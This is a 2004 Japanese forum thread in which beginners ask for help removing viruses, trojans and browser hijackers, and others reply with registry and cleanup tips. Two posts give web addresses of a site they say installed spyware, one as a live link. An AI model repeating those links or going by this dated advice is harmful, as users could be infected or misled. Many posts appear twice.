>>598
検出名ぐらい書け。少し上のレスぐらい嫁。
検出名ぐらい書け。少し上のレスぐらい嫁。
>>598
貴方のスキルだと、クリーンインストールが確実です。
貴方のスキルだと、クリーンインストールが確実です。
>>599
買え
買え
>>599
ここでも読んどけ
http://www.microsoft.com/japan/security/security_bulletins/ms04-011e.asp
WindowsUpdateして、ウィルススキャンして、話はそれからだ
ここでも読んどけ
http://www.microsoft.com/japan/security/security_bulletins/ms04-011e.asp
WindowsUpdateして、ウィルススキャンして、話はそれからだ
606 :ひよこ名無しさん:04/07/30 01:07 ID:Dn/WgWEK
winXPHomeSP1、IE6SP1、ノートン2004、最新ファイルにアップデート済みです。
先程outlookexplessを起動したら、
W32.Netsky.P@mmのノートンの警告が出ました。
削除したものと検疫されたものがあり、ノートンメイン画面から
「レポート」->「検疫項目」と進むと
ファイル名が「○○○.tmp」
脅威名「不明」
元の場所「C:\Documents and Settings\ユーザー名\Local Settings\Temp」
で3つファイルがありました。
「バックアップ項目」を見ると、
detailes.zip、detailes_使っているメールアドレスアカウントの一つ.zip、
message.scrが2つ、website.zipの計5つがあります。
どれも検疫済みとして受信した日付が入っているのですが、
これは自分のPCは感染しておらず、受信しただけ、検疫済みで問題なし、
と考えていいのでしょうか。
今3通のメールの送信者表示は「シマンテック社の電子メールプロキシ」、
件名は「シマンテック社の電子メールプロキシがメールを削除しました」
になっています。
それと、この「検疫項目」と「バックアップ項目」は削除して構わないでしょうか?
先程outlookexplessを起動したら、
W32.Netsky.P@mmのノートンの警告が出ました。
削除したものと検疫されたものがあり、ノートンメイン画面から
「レポート」->「検疫項目」と進むと
ファイル名が「○○○.tmp」
脅威名「不明」
元の場所「C:\Documents and Settings\ユーザー名\Local Settings\Temp」
で3つファイルがありました。
「バックアップ項目」を見ると、
detailes.zip、detailes_使っているメールアドレスアカウントの一つ.zip、
message.scrが2つ、website.zipの計5つがあります。
どれも検疫済みとして受信した日付が入っているのですが、
これは自分のPCは感染しておらず、受信しただけ、検疫済みで問題なし、
と考えていいのでしょうか。
今3通のメールの送信者表示は「シマンテック社の電子メールプロキシ」、
件名は「シマンテック社の電子メールプロキシがメールを削除しました」
になっています。
それと、この「検疫項目」と「バックアップ項目」は削除して構わないでしょうか?
608 :599:04/07/30 01:28 ID:x0iZcqIj
レスありがとうございます。
Windows Updateのページでインストールの履歴を見たのですが、
KB835732は4月に自動更新してありました。
他には一体何をしたらいいのでしょうか。
Windows Updateのページでインストールの履歴を見たのですが、
KB835732は4月に自動更新してありました。
他には一体何をしたらいいのでしょうか。
>>608
自分に返ってるレスちゃんと読め
自分に返ってるレスちゃんと読め
610 :606:04/07/30 01:39 ID:Dn/WgWEK
レスありがとうございます。
今更やってきたウィルスに思い切りビビっていました。
件名が「シマンテック〜」になっていれば水際で防げている、ということですよね。
「感染していません」と出てくれればはっきり安心できるのにな…。
今更やってきたウィルスに思い切りビビっていました。
件名が「シマンテック〜」になっていれば水際で防げている、ということですよね。
「感染していません」と出てくれればはっきり安心できるのにな…。
611 :599:04/07/30 01:53 ID:x0iZcqIj
すいません…
ちゃんと読んでいるつもりなのですが、やはりよくわかりませんでした。
ありがとうございました。
ちゃんと読んでいるつもりなのですが、やはりよくわかりませんでした。
ありがとうございました。
612 :ひよこ名無しさん:04/07/30 02:41 ID:BYh2CgHf
こんなメールが届きました。
差出人:System Anti-Virus Administrator
件名: virus found in sent message "Re: Bad Request"
DO NOT REPLY TO THIS MESSAGE:
As your reply will go nowhere.
Attention: ○○○@yahoo.co.jp(私のメアド)
A virus was found in an Email message you sent.
This Email scanner intercepted it and stopped the entire message
reaching its destination.
The virus was reported to be:
Worm.SomeFool.P
差出人:System Anti-Virus Administrator
件名: virus found in sent message "Re: Bad Request"
DO NOT REPLY TO THIS MESSAGE:
As your reply will go nowhere.
Attention: ○○○@yahoo.co.jp(私のメアド)
A virus was found in an Email message you sent.
This Email scanner intercepted it and stopped the entire message
reaching its destination.
The virus was reported to be:
Worm.SomeFool.P
613 :612:04/07/30 02:42 ID:BYh2CgHf
(続き)
Please update your virus scanner/signatures or contact your local
IT support personnel as soon as possible. As you may have a virus
or a Trojan program installed on your system. For any questions
regarding the virus policies of this network, please contact
HostRocket.com Support Personnel. Support may be contacted via
Email at 'support.com' or through the support website
located at http://www.rocketsupport.com.
DO NOT REPLY TO THIS MESSAGE:
As your reply will go nowhere.
Your message was sent with the following envelope:
MAIL FROM: ○○○@yahoo.co.jp
RCPT TO: ×××@sunfinity.co.jp
... and with the following headers:
以下略
私のメアドからウイルスが発信されたということだと思うのですが、
ノートンで完全スキャンしましたが問題ありませんでした。
ちなみにノートンは常駐していますし、WINDOWS UPDATEも定期的に行っています。
一体どういうことなのでしょうか?
PCが感染しているなら対策を採らなければいけないと思いますが、
ウイルスソフトで検出されないならばどう対策してよいのかわかりません。
どなたかアドバイスをお願いします!
Please update your virus scanner/signatures or contact your local
IT support personnel as soon as possible. As you may have a virus
or a Trojan program installed on your system. For any questions
regarding the virus policies of this network, please contact
HostRocket.com Support Personnel. Support may be contacted via
Email at 'support.com' or through the support website
located at http://www.rocketsupport.com.
DO NOT REPLY TO THIS MESSAGE:
As your reply will go nowhere.
Your message was sent with the following envelope:
MAIL FROM: ○○○@yahoo.co.jp
RCPT TO: ×××@sunfinity.co.jp
... and with the following headers:
以下略
私のメアドからウイルスが発信されたということだと思うのですが、
ノートンで完全スキャンしましたが問題ありませんでした。
ちなみにノートンは常駐していますし、WINDOWS UPDATEも定期的に行っています。
一体どういうことなのでしょうか?
PCが感染しているなら対策を採らなければいけないと思いますが、
ウイルスソフトで検出されないならばどう対策してよいのかわかりません。
どなたかアドバイスをお願いします!
614 :612:04/07/30 02:42 ID:BYh2CgHf
(続き)
Please update your virus scanner/signatures or contact your local
IT support personnel as soon as possible. As you may have a virus
or a Trojan program installed on your system. For any questions
regarding the virus policies of this network, please contact
HostRocket.com Support Personnel. Support may be contacted via
Email at 'support.com' or through the support website
located at http://www.rocketsupport.com.
DO NOT REPLY TO THIS MESSAGE:
As your reply will go nowhere.
Your message was sent with the following envelope:
MAIL FROM: ○○○@yahoo.co.jp
RCPT TO: ×××@sunfinity.co.jp
... and with the following headers:
以下略
私のメアドからウイルスが発信されたということだと思うのですが、
ノートンで完全スキャンしましたが問題ありませんでした。
ちなみにノートンは常駐していますし、WINDOWS UPDATEも定期的に行っています。
一体どういうことなのでしょうか?
PCが感染しているなら対策を採らなければいけないと思いますが、
ウイルスソフトで検出されないならばどう対策してよいのかわかりません。
どなたかアドバイスをお願いします!
Please update your virus scanner/signatures or contact your local
IT support personnel as soon as possible. As you may have a virus
or a Trojan program installed on your system. For any questions
regarding the virus policies of this network, please contact
HostRocket.com Support Personnel. Support may be contacted via
Email at 'support.com' or through the support website
located at http://www.rocketsupport.com.
DO NOT REPLY TO THIS MESSAGE:
As your reply will go nowhere.
Your message was sent with the following envelope:
MAIL FROM: ○○○@yahoo.co.jp
RCPT TO: ×××@sunfinity.co.jp
... and with the following headers:
以下略
私のメアドからウイルスが発信されたということだと思うのですが、
ノートンで完全スキャンしましたが問題ありませんでした。
ちなみにノートンは常駐していますし、WINDOWS UPDATEも定期的に行っています。
一体どういうことなのでしょうか?
PCが感染しているなら対策を採らなければいけないと思いますが、
ウイルスソフトで検出されないならばどう対策してよいのかわかりません。
どなたかアドバイスをお願いします!
↑気にすんな。禿げるよ。
616 :612:04/07/30 02:47 ID:BYh2CgHf
2重書き込みしてしまい申し訳ありませんでした。
当方のスペックなど書き添えさせていただきます。
[OS] Windows XP Service Pack 1
[IE] 6.0.2800
[Shell32.dll] 6.0.2800
[ComCtl32.dll] 6.0.2800
ノートンアンチウイルス2004(定義ファイルは最新版です。)
当方のスペックなど書き添えさせていただきます。
[OS] Windows XP Service Pack 1
[IE] 6.0.2800
[Shell32.dll] 6.0.2800
[ComCtl32.dll] 6.0.2800
ノートンアンチウイルス2004(定義ファイルは最新版です。)
>>616
その文章の中にウィルス名が書いてあるだろう。それでぐぐれ。
その文章の中にウィルス名が書いてあるだろう。それでぐぐれ。
619 :ひよこ名無しさん:04/07/30 07:08 ID:SCZCMyJw
迂闊にも騙されてエロサイト(?)へのリンクを踏まされてしまい、
TROJ_PORNDIAL.BPと思われるウイルスの侵入を許してしまいました。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_PORNDIAL.BP
FWが外部へ接続するプログラムを感知したためexeファイルは削除したのですが、
その実行を命じているレジストリが見つからず、起動する度にエラーが出ます。
どうにも、トレンドマイクロに掲載されているキーがないのです。
検出されたexeファイル(msxmidi.exeとhost32.exe)からウイルス自体の見当は外れていないと思うのですが、
WEBSITEVIEWERというフォルダも作られていませんし、微妙に違うのかもしれません。
どなたかこの症状についての解答をお願いします。
TROJ_PORNDIAL.BPと思われるウイルスの侵入を許してしまいました。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_PORNDIAL.BP
FWが外部へ接続するプログラムを感知したためexeファイルは削除したのですが、
その実行を命じているレジストリが見つからず、起動する度にエラーが出ます。
どうにも、トレンドマイクロに掲載されているキーがないのです。
検出されたexeファイル(msxmidi.exeとhost32.exe)からウイルス自体の見当は外れていないと思うのですが、
WEBSITEVIEWERというフォルダも作られていませんし、微妙に違うのかもしれません。
どなたかこの症状についての解答をお願いします。
620 :598:04/07/30 07:10 ID:M6bYuNzi
ID変わってるかもしれませんが598です。
状況を書き直します。
OS:Win Pro
IE:6.0.2800
セキュリティソフト:ウィルスセキュリティ2005(ソースネクスト)
当初ノートンを入れていたのですが、アンインストールしてウィルスセキュリティ2005に変えました。
警告文は、
ウイルスを検知しましたが処理しました。ご安心ください。
ファイル:wingkpc.dll
場所:C:/WINDOWS/System32
ウイルス名:W32.Agent.AC.Backdoor
この警告文がとても頻繁に出るので、CWSheldderやAd-wareなどで駆除を試みましたが、いぜん駆除できません。(セーフモードでもやりました。)
フォルダーオプションの「隠してあるファイルを全て表示する」をしてもファイルさえ見つからないヘタれです。
少し上のほうに、
234 :ひよこ名無しさん :04/07/19 19:24 ID:???
>>226
またそのパターンか
それも、そのファイルをインストールしている大元のファイルがあるんじゃないのか?
レジストリのスタートアップを確認しろ。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
と、ありましたが、何のことかわかりませんでした。
状況を書き直します。
OS:Win Pro
IE:6.0.2800
セキュリティソフト:ウィルスセキュリティ2005(ソースネクスト)
当初ノートンを入れていたのですが、アンインストールしてウィルスセキュリティ2005に変えました。
警告文は、
ウイルスを検知しましたが処理しました。ご安心ください。
ファイル:wingkpc.dll
場所:C:/WINDOWS/System32
ウイルス名:W32.Agent.AC.Backdoor
この警告文がとても頻繁に出るので、CWSheldderやAd-wareなどで駆除を試みましたが、いぜん駆除できません。(セーフモードでもやりました。)
フォルダーオプションの「隠してあるファイルを全て表示する」をしてもファイルさえ見つからないヘタれです。
少し上のほうに、
234 :ひよこ名無しさん :04/07/19 19:24 ID:???
>>226
またそのパターンか
それも、そのファイルをインストールしている大元のファイルがあるんじゃないのか?
レジストリのスタートアップを確認しろ。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
と、ありましたが、何のことかわかりませんでした。
>>620
会社は違うがレジストリ関係の場所等の情報は、
ここも参考になる。
TROJ_AGENT.AC
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_AGENT.AC
会社は違うがレジストリ関係の場所等の情報は、
ここも参考になる。
TROJ_AGENT.AC
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_AGENT.AC
>>620
最近はここに仕掛けるトロイが増えてきている
登録されていたら異常だから、調べてみたら?
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=9286
なかったら、レジストリをwingkpc.dllで検索すると見つかると思うけど、
見つかったら、レジストリから削除する。
最近はここに仕掛けるトロイが増えてきている
登録されていたら異常だから、調べてみたら?
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=9286
なかったら、レジストリをwingkpc.dllで検索すると見つかると思うけど、
見つかったら、レジストリから削除する。
624 :ひよこ名無しさん:04/07/30 12:36 ID:wUDrZfxz
Windous XPを使ってるんですが
ちなみにオカシナ所とゆうのは
InternetExplorerの「ツール」メニュー「インターネットオプション」
の場所で「インターネット一時ファイル」の上にある
「ホームページ」のアドレスが『about:blank』とゆうのになってて
設定を変えても最初は変えたとおりに表示されるのですが
しばらくするとまた『about:blank』とゆう表示に戻ってしまうことです
ちなみにギコナビのレスを表示する場所は今までスレを選択してない時は
何も表示されなかったのですが今はその『about:blank』のホームページが
表示されます
分かりにくい文章でスミマセン
誰か助けて下さい。
ちなみにオカシナ所とゆうのは
InternetExplorerの「ツール」メニュー「インターネットオプション」
の場所で「インターネット一時ファイル」の上にある
「ホームページ」のアドレスが『about:blank』とゆうのになってて
設定を変えても最初は変えたとおりに表示されるのですが
しばらくするとまた『about:blank』とゆう表示に戻ってしまうことです
ちなみにギコナビのレスを表示する場所は今までスレを選択してない時は
何も表示されなかったのですが今はその『about:blank』のホームページが
表示されます
分かりにくい文章でスミマセン
誰か助けて下さい。
>>624
えろいひと"キタ━━━━ヽミ´∀`,,彡ノ━━━━!!!!"
えろいひと"キタ━━━━ヽミ´∀`,,彡ノ━━━━!!!!"
>>624
君も好きな人だね(・∀・)ニヤニヤ
君も好きな人だね(・∀・)ニヤニヤ
>>626
ここのテンプレじゃ治らない思うぞ・・・。
>>624
こっちのテンプレへどうぞ。
エロサイト見たら…助けてください!Part35
http://pc6.2ch.net/test/read.cgi/pcqa/1091090092/
ここのテンプレじゃ治らない思うぞ・・・。
>>624
こっちのテンプレへどうぞ。
エロサイト見たら…助けてください!Part35
http://pc6.2ch.net/test/read.cgi/pcqa/1091090092/
AppInit_DLLs で検索
約69件中
結構増えて来た
約69件中
結構増えて来た
630 :ひよこ名無しさん:04/07/31 16:47 ID:BI3ptwHO
質問です。
WIN Meのノートパソコンを使っており、
C:_RESTOREフォルダの中にあるウィルス感染ファイルを削除したいのですが、
調べたところマイコンピュータのプロパティで
「システムの復元をOFFにした後にまた戻せばいい」とあったのですが、
見てみると始めからOFFになっていました。
一旦ONにしてみても、再起動したりOKを押した時点でまたOFFになっています。
ちなみにC:_RESTOREフォルダのファイル数は三万以上、容量は1.6GBです。
これはやはりウィルスが原因なのでしょうか?
わかる方がいればお教えください。
WIN Meのノートパソコンを使っており、
C:_RESTOREフォルダの中にあるウィルス感染ファイルを削除したいのですが、
調べたところマイコンピュータのプロパティで
「システムの復元をOFFにした後にまた戻せばいい」とあったのですが、
見てみると始めからOFFになっていました。
一旦ONにしてみても、再起動したりOKを押した時点でまたOFFになっています。
ちなみにC:_RESTOREフォルダのファイル数は三万以上、容量は1.6GBです。
これはやはりウィルスが原因なのでしょうか?
わかる方がいればお教えください。
過去にシステムの復元を実行したことがあるんだろ。
633 :630:04/07/31 17:11 ID:BI3ptwHO
>>632
とりあえず自分で調べてみたところ、
システムの復元の停止が有効とあったので試したところ、
その復元自体が出来なかったので
そのスレでシステム的な質問をするのはスレ違いだと思い
PC初心者総合スレで質問させていただいたところ、
ウィルスが原因だと思いこのスレで質問させていただきました。
結果的にマルチになってしまいすみません。
とりあえず自分で調べてみたところ、
システムの復元の停止が有効とあったので試したところ、
その復元自体が出来なかったので
そのスレでシステム的な質問をするのはスレ違いだと思い
PC初心者総合スレで質問させていただいたところ、
ウィルスが原因だと思いこのスレで質問させていただきました。
結果的にマルチになってしまいすみません。
634 :630:04/07/31 17:12 ID:BI3ptwHO
635 :ひよこ名無しさん:04/07/31 19:02 ID:OoWAq6wK
OSがwindowsXPのパソコンを使ってるんですが、
ログイン後に自動的にログアウトしてしまい、
パソコンがパソコンとしての機能を果たしてくれません。
これはウィルスなんでしょうか?解決策があればどなたか教えてください
ログイン後に自動的にログアウトしてしまい、
パソコンがパソコンとしての機能を果たしてくれません。
これはウィルスなんでしょうか?解決策があればどなたか教えてください
ウイルスです
637 :635:04/07/31 19:11 ID:OoWAq6wK
解決策を教えていただけないでしょうか?
セーフティーモードで起動させてもログアウトされるし
マイクロソフトのホームページにも解決策がでてないんですが
セーフティーモードで起動させてもログアウトされるし
マイクロソフトのホームページにも解決策がでてないんですが
>>637
修復インストール。
http://support.microsoft.com/default.aspx?scid=kb%3bja%3b881207
メーカー製のPCだとXPのCD-ROMじゃなくてリカバリだから出来ないけどな。
お前、PCの型番等書いてないからな。
修復インストール。
http://support.microsoft.com/default.aspx?scid=kb%3bja%3b881207
メーカー製のPCだとXPのCD-ROMじゃなくてリカバリだから出来ないけどな。
お前、PCの型番等書いてないからな。
639 :ひよこ名無しさん:04/08/01 01:35 ID:+70JLl2L
VBS.Redlof.Aとか言うウィルスに感染しました。
急いでノートンインターネットセキュリティ入れたんですけど
ノートンアンチウィルスがインストール出来てないみたいで(ドライバがインストール出来ない?)
もう何がなにやら…
本当に申し訳ありませんが、どなたか助けて下さい!
因みにOSは98です。
急いでノートンインターネットセキュリティ入れたんですけど
ノートンアンチウィルスがインストール出来てないみたいで(ドライバがインストール出来ない?)
もう何がなにやら…
本当に申し訳ありませんが、どなたか助けて下さい!
因みにOSは98です。
640 :ひよこ名無しさん:04/08/01 01:38 ID:djdJ1QKk
2ちゃんブラウザでガイドライン板を開こうとすると、ノートンが「UNIX PENGUINを発見しました」と警告してきます
他の板では症状がでないのですが、何が原因と思われますか?
ちなみに、ブラウザはLIVE2ch、XPのIE最新版、火壁オフです。
他の板では症状がでないのですが、何が原因と思われますか?
ちなみに、ブラウザはLIVE2ch、XPのIE最新版、火壁オフです。
>>640
ノートンの誤反応
ノートンの誤反応
>>640
ウイルスコードの一部をスレタイにしてスレ立ててるバカがいるから
ウイルスコードの一部をスレタイにしてスレ立ててるバカがいるから
643 :ひよこ名無しさん:04/08/01 01:42 ID:djdJ1QKk
どうもありがとうございました
>>639
君には泥縄という言葉を贈る
君には泥縄という言葉を贈る
646 :ひよこ名無しさん:04/08/01 02:14 ID:W27+D3hA
trojan backdoor
に罹ってるからAVGを立ち上げてウイルスを駆除してください、
というウインドウが出るのでAVGを走らせるのですが何も引っかかりません。
頻繁にこういうことがあります。
今日「a2」というソフトも走らせたのですが、何も引っかかりませんでした。
これはなんでしょうか?
に罹ってるからAVGを立ち上げてウイルスを駆除してください、
というウインドウが出るのでAVGを走らせるのですが何も引っかかりません。
頻繁にこういうことがあります。
今日「a2」というソフトも走らせたのですが、何も引っかかりませんでした。
これはなんでしょうか?
649 :646:04/08/01 04:03 ID:W27+D3hA
レスありがトン>>647>>648
>>648
AVGの警告ウインドウにでるファイル名を検索してみるんですが見つかりません。
これはつまりレジストリにもそのウイルスのいる場所がないっていうことですよね?
ああー、、自分でも恥ずかしいくらい文がしょぼい。
文がわからなかったらすいません。
>>648
AVGの警告ウインドウにでるファイル名を検索してみるんですが見つかりません。
これはつまりレジストリにもそのウイルスのいる場所がないっていうことですよね?
ああー、、自分でも恥ずかしいくらい文がしょぼい。
文がわからなかったらすいません。
>>649
トロイでもいっぱいあるからねえ これかな?
http://www.mcafeesecurity.com/japan/security/virB2002.asp?v=BackDoor-ABH
トロイでもいっぱいあるからねえ これかな?
http://www.mcafeesecurity.com/japan/security/virB2002.asp?v=BackDoor-ABH
>>649
知り得た情報を全部正確に書かないと適当なレスしかつかない。
普通に考えたら、AVGの次にa2とは考えないね。
判断がつかないとしたらまず>>2のオンラインスキャンを全部やって
それぞれの結果を確認するぐらいのことは最初にやるべきだと思う。
知り得た情報を全部正確に書かないと適当なレスしかつかない。
普通に考えたら、AVGの次にa2とは考えないね。
判断がつかないとしたらまず>>2のオンラインスキャンを全部やって
それぞれの結果を確認するぐらいのことは最初にやるべきだと思う。
窓の杜 - 【NEWS】多くの解凍ソフトに指定外の場所へファイルが解凍されてしまう脆弱性が存在
http://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html
http://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html
Mad.damはウイルスですか?
駆除できないし情報も検索してもほぼ出てこないので…
駆除できないし情報も検索してもほぼ出てこないので…
654 :ひよこ名無しさん:04/08/01 19:50 ID:RTrD/mSD
Trojan.W32.vise.a
というのに感染してしまいました。
シマンテックでは情報がなかったので駆除方法が解りません。
どこか駆除方法など詳細のあるサイトはないでしょうか?
というのに感染してしまいました。
シマンテックでは情報がなかったので駆除方法が解りません。
どこか駆除方法など詳細のあるサイトはないでしょうか?
>>655
すみません、少し焦ってました
怪しいファイルを誤って実行してしまい、メモリ上をアンチウィルスソフトでスキャンしたところ
Trojan.W32.vise.aを駆除したと表示されました。
一応メモリ上からは駆除されたようなのですが、PEファイルに感染するタイプのようで
システムが破壊されていないかと思い、Windowsフォルダをスキャンしましたが
windowsフォルダからは発見されませんでした。
すみません、少し焦ってました
怪しいファイルを誤って実行してしまい、メモリ上をアンチウィルスソフトでスキャンしたところ
Trojan.W32.vise.aを駆除したと表示されました。
一応メモリ上からは駆除されたようなのですが、PEファイルに感染するタイプのようで
システムが破壊されていないかと思い、Windowsフォルダをスキャンしましたが
windowsフォルダからは発見されませんでした。
>>657
どこで発見したかのログが残っていないので不明ですが
レジストリ、mp3、jpgなどのファイルは影響を受けていないようなので
とりあえず安心しました。今はドライブのスキャン終了待ちです。
お騒がせしました。
どこで発見したかのログが残っていないので不明ですが
レジストリ、mp3、jpgなどのファイルは影響を受けていないようなので
とりあえず安心しました。今はドライブのスキャン終了待ちです。
お騒がせしました。
外国製のフリーアンチウィルスソフトの話ってタブー?
>>659
ソフトの話はこっち。 セキュリティ板に無料ソフトスレがある。
【初心者向】ウイルス対策ソフト質問スレ part3
http://pc6.2ch.net/test/read.cgi/pcqa/1086590699/
ソフトの話はこっち。 セキュリティ板に無料ソフトスレがある。
【初心者向】ウイルス対策ソフト質問スレ part3
http://pc6.2ch.net/test/read.cgi/pcqa/1086590699/
662 :646:04/08/02 11:32 ID:JLIfZAdq
663 :ひよこ名無しさん:04/08/02 11:54 ID:5xPyqiqo
ノートンアンチ使ってるんですけど(しかも英語版)
ウィルススキャン始めるととんでもない数をスキャンしだして
いつまでたってもウィルス駆除してくれないんだけど・・・
ウィルススキャン始めるととんでもない数をスキャンしだして
いつまでたってもウィルス駆除してくれないんだけど・・・
>>663
で?
で?
無料のメールアドレスからウィルスが送信されているんですが
どうすればいいのでしょうか?
(あなたのアドレスからウィルスが
送信されていますという警告メールがきました)
ブラウザ上からの利用しかしてないのに、
何かに感染することはあるのでしょうか
どうすればいいのでしょうか?
(あなたのアドレスからウィルスが
送信されていますという警告メールがきました)
ブラウザ上からの利用しかしてないのに、
何かに感染することはあるのでしょうか
>>666
質問する時はID出して。
その警告メール自体があやしい可能性がある。いたずらや添付ウイルス付き。
誰かがメールアドレスを勝手に使ってるとかか、
メールを送ったことがある誰かがウイルスに感染してアドレス帳から取得→送信とかも。
質問する時はID出して。
その警告メール自体があやしい可能性がある。いたずらや添付ウイルス付き。
誰かがメールアドレスを勝手に使ってるとかか、
メールを送ったことがある誰かがウイルスに感染してアドレス帳から取得→送信とかも。
668 :666:04/08/02 12:54 ID:kh8Q6uns
>>668
窓の手使え。
窓の手使え。
最近よくPCが突然切れるのですが、これってウィルスですかね?
パワーランプが点滅してて、パワーボタン押しても応答しなくなるのでいつも電源ブチッってしてます。
パワーランプが点滅してて、パワーボタン押しても応答しなくなるのでいつも電源ブチッってしてます。
>>670
ホコリでも詰まってんだろ
ホコリでも詰まってんだろ
672 :ひよこ名無しさん:04/08/02 23:29 ID:qsMxhms1
Trojan.Win32.Startpage.ixというウイルスの存在はスキャンで確認できたんですが
最新版のノートンでも駆除ができない、というかウイルスが発見されません。
どうしてでしょうか…
最新版のノートンでも駆除ができない、というかウイルスが発見されません。
どうしてでしょうか…
>>672
どのフォルダ内で見つかったの?
どのフォルダ内で見つかったの?
674 :ひよこ名無しさん:04/08/02 23:32 ID:7JjGfRH0
Cameron Diaz画像集
http://www.sexydesktop.co.uk/diaz.htm
↑にアクセスして、スパイウェア?ってやつくらったみたいなんですけど
どうしたら削除できますか?何か、開くのが重くなったみたいです。
http://www.sexydesktop.co.uk/diaz.htm
↑にアクセスして、スパイウェア?ってやつくらったみたいなんですけど
どうしたら削除できますか?何か、開くのが重くなったみたいです。
>>674
何故スパイだと思ったの?
何故スパイだと思ったの?
676 :ひよこ名無しさん:04/08/02 23:36 ID:7JjGfRH0
>>674
あちこちに直リンすんなや禿!
あちこちに直リンすんなや禿!
678 :ひよこ名無しさん:04/08/02 23:38 ID:7JjGfRH0
679 :ひよこ名無しさん:04/08/02 23:39 ID:qsMxhms1
>>673
CドライブのWINDOWS¥SYSTEM¥jldp.dllという所です
CドライブのWINDOWS¥SYSTEM¥jldp.dllという所です
>>674
症状は重くなっただけ?
症状は重くなっただけ?
>>678
そのまま貼ると他のやつが踏むから先頭のhを抜けってこと。
そのまま貼ると他のやつが踏むから先頭のhを抜けってこと。
682 :ひよこ名無しさん:04/08/02 23:43 ID:7JjGfRH0
聞かれた事にさっさと答えろよ。
ウィルスチェックとスパイウェアチェックをやれ。
この分だと面倒臭そうなので降りた。
ウィルスチェックとスパイウェアチェックをやれ。
この分だと面倒臭そうなので降りた。
684 :ひよこ名無しさん:04/08/02 23:46 ID:7JjGfRH0
>>684
気にスンナ、ハゲ
気にスンナ、ハゲ
>>684
再起動してみ。
再起動してみ。
687 :ひよこ名無しさん:04/08/02 23:51 ID:7JjGfRH0
>>679
そこにウィルスがあるのなら そこだけノートンかけてみて。
そこにウィルスがあるのなら そこだけノートンかけてみて。
689 :ひよこ名無しさん:04/08/02 23:57 ID:qsMxhms1
>>688
ノートンかけましたが発見されなかったです…
ノートンかけましたが発見されなかったです…
奇奇怪怪。
実態のないウイルス出現。
ってか?
実態のないウイルス出現。
ってか?
Trojan.Win32.Startpageならシマンテックで見つかるが
Trojan.Win32.Startpage.ixってのは無いな
ixって何?
Trojan.Win32.Startpage.ixってのは無いな
ixって何?
693 :ひよこ名無しさん:04/08/03 00:05 ID:e1cl+KUH
>>692
亜種
亜種
情報の小出しで来たよ。
スパイだな、それ
アドレスがabout:blankになってるだろ?
画面は何になってる?
アドレスがabout:blankになってるだろ?
画面は何になってる?
697 :ひよこ名無しさん:04/08/03 00:09 ID:e1cl+KUH
>>697
ウイルスです。
ウイルスです。
700 :ひよこ名無しさん:04/08/03 00:13 ID:e1cl+KUH
703 :ひよこ名無しさん:04/08/03 00:17 ID:e1cl+KUH
>>701
じゃあspy-botで削除しきれないものがあったって事でしょうか?
じゃあspy-botで削除しきれないものがあったって事でしょうか?
>>703
その通りです。
その通りです。
>スパイウェア=トロイの木馬
ちゃうわ
ちゃうわ
まぁ、でも最近のスパイウェアはウィルスベンダはトロイとしてるね。
>>703
spybotは特定のスパイの駆除を得意とするので、それ以外のスパイの駆除はあんまり得意でない
spybotは特定のスパイの駆除を得意とするので、それ以外のスパイの駆除はあんまり得意でない
709 :700:04/08/03 01:20 ID:e1cl+KUH
エロサイトスレのテンプレのインターネット一時ファイルの削除というのを
やったら何事も無かったようにabout:blankの症状は消えました。
ただ、ANTIDOTE for PCというものでスキャンをしているのですが相変わらず
ウイルスが発見されてしまいます。ノートンでは見つかりません…
やったら何事も無かったようにabout:blankの症状は消えました。
ただ、ANTIDOTE for PCというものでスキャンをしているのですが相変わらず
ウイルスが発見されてしまいます。ノートンでは見つかりません…
711 :ひよこ名無しさん:04/08/03 05:47 ID:xFiM9jwi
674さんの関連ですが私もHolly Balance の画像集を検索していて
まったく同じHP
ttp://www.sexydesktop.co.uk/holly.htmでスパイウェア
"TROJ_SCTHOUGHT.C"に感染してしまいました。
踏んだ瞬間、ウィルスバスターが緊急報告してくれました。
メッセージは"隔離できませんでした"とのこと。
シマンテックの対策HPでは、感染したファイルを全部削除しろ
と書いてあったのですが、ノートン使ってないので削除できません。
感染ファイルのある場所は
C:\Documents and Settings\username\Local Settings\Temporary Internet Files\Content.IE5\FW1WFZHO\install026[1].exe
ですが、エクスプローラではLocal Settingsホルダーが見当たりません。
どうしたらいいでしょうか?
まったく同じHP
ttp://www.sexydesktop.co.uk/holly.htmでスパイウェア
"TROJ_SCTHOUGHT.C"に感染してしまいました。
踏んだ瞬間、ウィルスバスターが緊急報告してくれました。
メッセージは"隔離できませんでした"とのこと。
シマンテックの対策HPでは、感染したファイルを全部削除しろ
と書いてあったのですが、ノートン使ってないので削除できません。
感染ファイルのある場所は
C:\Documents and Settings\username\Local Settings\Temporary Internet Files\Content.IE5\FW1WFZHO\install026[1].exe
ですが、エクスプローラではLocal Settingsホルダーが見当たりません。
どうしたらいいでしょうか?
>>711
そう、それまだ感染って言わないね
そう、それまだ感染って言わないね
713 :ひよこ名無しさん:04/08/03 06:17 ID:WcxKyAtL
普通、ウィルスメール(W32.Netsky.Q@mm)が来てもサーバ側で弾かれるが
最近ちょこちょこと弾かれず直接届く事が多い。 考えられる理由を
教えてくらはい。 サーバ名晒していいの?
最近ちょこちょこと弾かれず直接届く事が多い。 考えられる理由を
教えてくらはい。 サーバ名晒していいの?
714 :ひよこ名無しさん:04/08/03 06:19 ID:iM7VIQwS
Nortonを起動させてると2ちゃんに書き込めません
バージョンは最新だと思います
セキュティのレベルはすべて推奨されてるレベルです
どうしたらいいですか
バージョンは最新だと思います
セキュティのレベルはすべて推奨されてるレベルです
どうしたらいいですか
>>714
買い換えろ、デブ。
買い換えろ、デブ。
すいません 書き込む場所まちがえました
718 :ひよこ名無しさん:04/08/03 07:10 ID:xFiM9jwi
また逆切れかよ。
口調の変化が素でこわいw
